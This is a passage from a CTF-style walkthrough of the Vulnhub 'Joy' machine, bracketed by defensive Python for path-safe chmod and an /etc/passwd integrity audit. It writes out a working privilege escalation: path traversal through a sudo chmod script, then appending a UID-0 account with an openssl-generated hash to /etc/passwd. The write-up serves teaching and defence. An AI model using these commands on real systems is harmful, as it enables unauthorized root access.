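    if not MODE_RE.match(mode_str):
        raise ValueError("mode must be 3 or 4 octal digits")
    target = resolve_inside(base_dir, user_path)
    # Open the checked path without following a final symlink and chmod the
    # descriptor, so a symlink swapped in after the check cannot redirect the chmod.
    fd = os.open(target, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        os.fchmod(fd, int(mode_str, 8))
    finally:
        os.close(fd)
    return target


def demo() -> dict:
    """Run three constructed cases: a file inside the script directory, a '../'
    traversal to a stand-in for /etc/passwd, and a symlink inside the directory
    pointing at that stand-in. Returns {case: outcome} plus the resulting modes."""
    results = {}
    with tempfile.TemporaryDirectory() as script_dir, tempfile.TemporaryDirectory() as outside:
        inside = os.path.join(script_dir, "notes.txt")
        secret = os.path.join(outside, "passwd")          # stand-in for /etc/passwd
        for p in (inside, secret):
            with open(p, "w") as fh:
                fh.write("x\n")
            os.chmod(p, 0o644)
        os.symlink(secret, os.path.join(script_dir, "link"))
        cases = {
            "inside": "notes.txt",
            "traversal": os.path.relpath(secret, script_dir),
            "symlink": "link",
        }
        for name, requested in cases.items():
            try:
                safe_chmod(script_dir, requested, "755")
                results[name] = "changed"
            except RejectedPath:
                results[name] = "rejected"
        results["inside_mode"] = oct(stat.S_IMODE(os.stat(inside).st_mode))
        results["secret_mode"] = oct(stat.S_IMODE(os.stat(secret).st_mode))
    return results


if __name__ == "__main__":
    print(demo())
```

In a bash script the equivalent check is `realpath -e` on the joined path followed by a comparison against the script directory; even with it, letting root chmod files inside a directory the invoking user owns remains a weak design.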

Because test is only supposed to change the permissions of files under the /script directory, it has to be bypassed; the `../../../../../../../etc/passwd` path traversal above does exactly that.

Now /etc/passwd can be modified and the root password removed:

patrick@JOY:/tmp$ nano /etc/passwd
nano /etc/passwd
Error opening terminal: unknown.
patrick@JOY:/tmp$      

But nano cannot be used in this shell.

It seems the only option is to append content:

patrick@JOY:~$ sed -i '1c root::0:0:root:/root:/bin/bash' /etc/passwd
sed -i '1c root::0:0:root:/root:/bin/bash' /etc/passwd
sed: couldn't open temporary file /etc/sedu0TEOo: Permission denied
patrick@JOY:~$ which sed
which sed
/bin/sed
patrick@JOY:~$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
patrick@JOY:~$ echo 'test' >> /etc/passwd
echo 'test' >> /etc/passwd
patrick@JOY:~$  

We can create a user and give it root privileges:

┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ openssl passwd -1 -salt jason 12345
$1$jason$qsg4ck0ojTQvTEpTDPg2C1

Append the user jason to /etc/passwd:

patrick@JOY:~$ echo 'jason:$1$jason$qsg4ck0ojTQvTEpTDPg2C1:0:0:root:/root:/bin/bash' >>/etc/passwd
<vTEpTDPg2C1:0:0:root:/root:/bin/bash' >>/etc/passwd
patrick@JOY:~$ su jason  
su jason
Password: 12345

root@JOY:/home/patrick# cd /root
cd /root
root@JOY:~# ls -alh
ls -alh
total 104K
drwx------  8 root root 4.0K Jan 28  2019 .
drwxr-xr-x 23 root root 4.0K Jan  6  2019 ..
----------  1 root root 1.4K Jan 27  2019 author-secret.txt
-rw-------  1 root root 3.1K Jan 28  2019 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  3 root root 4.0K Jan  5  2019 .cache
drwxr-xr-x  5 root root 4.0K Jan  5  2019 .config
drwx------  3 root root 4.0K Jan  5  2019 .dbus
-rw-r--r--  1 root root  435 Jan  7  2019 document-generator.sh
-rw-r--r--  1 root root 1.3K Jan 28  2019 dovecot.crt
-rw-r--r--  1 root root 1.1K Jan 28  2019 dovecot.csr
-rw-------  1 root root 1.7K Jan 28  2019 dovecot.key
drwxr-xr-x  3 root root 4.0K Jan  5  2019 .local
-rw-------  1 root root  231 Dec 28  2018 .msmtprc
-rw-------  1 root root   36 Dec 28  2018 .mysql_history
drwxr-xr-x  2 root root 4.0K Dec 28  2018 .nano
-rw-r--r--  1 root root  540 Jan 10  2019 permissions.sh
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
----------  1 root root   71 Jan 10  2019 proof.txt
-rw-------  1 root root 1.0K Jan 28  2019 .rnd
-rw-------  1 root root 1.7K Jan 28  2019 rootCA.key
-rw-r--r--  1 root root 1.5K Jan 28  2019 rootCA.pem
-rw-r--r--  1 root root   17 Jan 28  2019 rootCA.srl
-rw-r--r--  1 root root   66 Jan  6  2019 .selected_editor
drwx------  2 root root 4.0K Jan  6  2019 .ssh
-rw-r--r--  1 root root  209 Dec 28  2018 .wget-hsts
root@JOY:~# cat proof.txt
cat proof.txt
Never grant sudo permissions on scripts that perform system functions!
root@JOY:~# 

The root flag has been obtained.
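Everything done to /etc/passwd on this box (the 777 mode set through the sudo script, the stray `test` line, and the appended second UID-0 account with a hash stored directly in the file) is visible in a simple integrity check. The following Python example is added here and is not part of the original post; the passwd content is constructed to mirror the state the box is left in, and the rule names are the example's own.

```python
import os
import stat
import tempfile

# Constructed /etc/passwd content mirroring the end state of the walkthrough: the
# "test" line left by the write test and the appended UID-0 account "jason".
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
test
jason:$1$jason$qsg4ck0ojTQvTEpTDPg2C1:0:0:root:/root:/bin/bash
"""

# Password-field values that mean "see /etc/shadow" or "locked"; anything else is a hash.
SHADOWED = {"x", "*", "!", "!!"}


def audit_passwd_entries(text):
    """Return (rule, line_number, line) for every entry that should not be in /etc/passwd."""
    findings = []
    seen = set()
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:                       # the bare "test" line lands here
            findings.append(("malformed-entry", n, line))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if name in seen:
            findings.append(("duplicate-user", n, line))
        seen.add(name)
        if not uid.isdigit():
            findings.append(("non-numeric-uid", n, line))
            continue
        if uid == "0" and name != "root":          # the appended jason line
            findings.append(("extra-uid0-account", n, line))
        if pw == "":
            findings.append(("empty-password", n, line))
        elif pw not in SHADOWED:                   # hash kept in passwd, bypassing shadow
            findings.append(("hash-in-passwd", n, line))
    return findings


def audit_passwd_mode(path):
    """Return (rule, detail) findings for the file's mode and ownership."""
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):       # 777 after the sudo script above
        findings.append(("group-or-world-writable", oct(mode)))
    if st.st_uid != 0:
        findings.append(("not-owned-by-root", str(st.st_uid)))
    return findings


def demo_mode():
    """Audit a constructed copy of the file at mode 777 and again at 644."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, 0o777)
        writable = audit_passwd_mode(path)
        os.chmod(path, 0o644)
        restored = audit_passwd_mode(path)
    finally:
        os.unlink(path)
    return writable, restored


if __name__ == "__main__":
    for finding in audit_passwd_entries(SAMPLE_PASSWD):
        print(finding)
    print(audit_passwd_mode("/etc/passwd"))
```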

Lessons learned

  1. On this machine, almost no useful information came from the web service on port 80.
posted @ 2022-12-04 20:10 by Jason_huawen